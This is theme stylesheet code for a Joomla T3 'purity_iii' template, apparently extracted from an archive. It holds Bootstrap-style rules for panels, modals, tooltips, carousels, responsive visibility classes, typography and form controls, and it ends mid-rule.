.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0px;
}
.well-sm {
  padding: 9px;
  border-radius: 0px;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  opacity: 0.2;
  filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  opacity: 0.5;
  filter: alpha(opacity=50);
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  display: none;
  overflow: hidden;
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  background-clip: padding-box;
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
  min-height: 21.42857143px;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-left: 5px;
  margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 12px;
  font-weight: normal;
  line-height: 1.4;
  opacity: 0;
  filter: alpha(opacity=0);
}
.tooltip.in {
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.tooltip.top {
  margin-top: -3px;
  padding: 5px 0;
}
.tooltip.right {
  margin-left: 3px;
  padding: 0 5px;
}
.tooltip.bottom {
  margin-top: 3px;
  padding: 5px 0;
}
.tooltip.left {
  margin-left: -3px;
  padding: 0 5px;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  text-decoration: none;
  background-color: #000000;
  border-radius: 0px;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: left;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  white-space: normal;
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover-title {
  margin: 0;
  padding: 8px 14px;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1px -1px 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow:after {
  border-width: 10px;
  content: "";
}
.popover.top > .arrow {
  left: 50%;
  margin-left: -11px;
  border-bottom-width: 0;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  bottom: -11px;
}
.popover.top > .arrow:after {
  content: " ";
  bottom: 1px;
  margin-left: -10px;
  border-bottom-width: 0;
  border-top-color: #ffffff;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.right > .arrow:after {
  content: " ";
  left: 1px;
  bottom: -10px;
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover.bottom > .arrow {
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
  top: -11px;
}
.popover.bottom > .arrow:after {
  content: " ";
  top: 1px;
  margin-left: -10px;
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  content: " ";
  right: 1px;
  border-right-width: 0;
  border-left-color: #ffffff;
  bottom: -10px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  overflow: hidden;
  width: 100%;
}
.carousel-inner > .item {
  display: none;
  position: relative;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000;
    -moz-perspective: 1000;
    perspective: 1000;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  width: 15%;
  opacity: 0.5;
  filter: alpha(opacity=50);
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
}
.carousel-control.right {
  left: auto;
  right: 0;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
}
.carousel-control:hover,
.carousel-control:focus {
  outline: 0;
  color: #ffffff;
  text-decoration: none;
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  margin-top: -10px;
  line-height: 1;
  font-family: serif;
}
.carousel-control .icon-prev:before {
  content: '\2039';
}
.carousel-control .icon-next:before {
  content: '\203a';
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  margin-left: -30%;
  padding-left: 0;
  list-style: none;
  text-align: center;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  border: 1px solid #ffffff;
  border-radius: 10px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
}
.carousel-indicators .active {
  margin: 0;
  width: 12px;
  height: 12px;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  right: 15%;
  bottom: 20px;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -15px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -15px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -15px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-footer:before,
.modal-footer:after {
  content: " ";
  display: table;
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKԜ�\4�I��-purity_iii/local/css/themes/vert/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #10bf00;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #0a7300;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #10bf00;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    content: " ";
    display: table;
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:hover,
.btn-inverse:focus,
.btn-inverse.focus,
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  background-image: none;
}
.btn-inverse.disabled,
.btn-inverse[disabled],
fieldset[disabled] .btn-inverse,
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus,
.btn-inverse.disabled:active,
.btn-inverse[disabled]:active,
fieldset[disabled] .btn-inverse:active,
.btn-inverse.disabled.active,
.btn-inverse[disabled].active,
fieldset[disabled] .btn-inverse.active {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
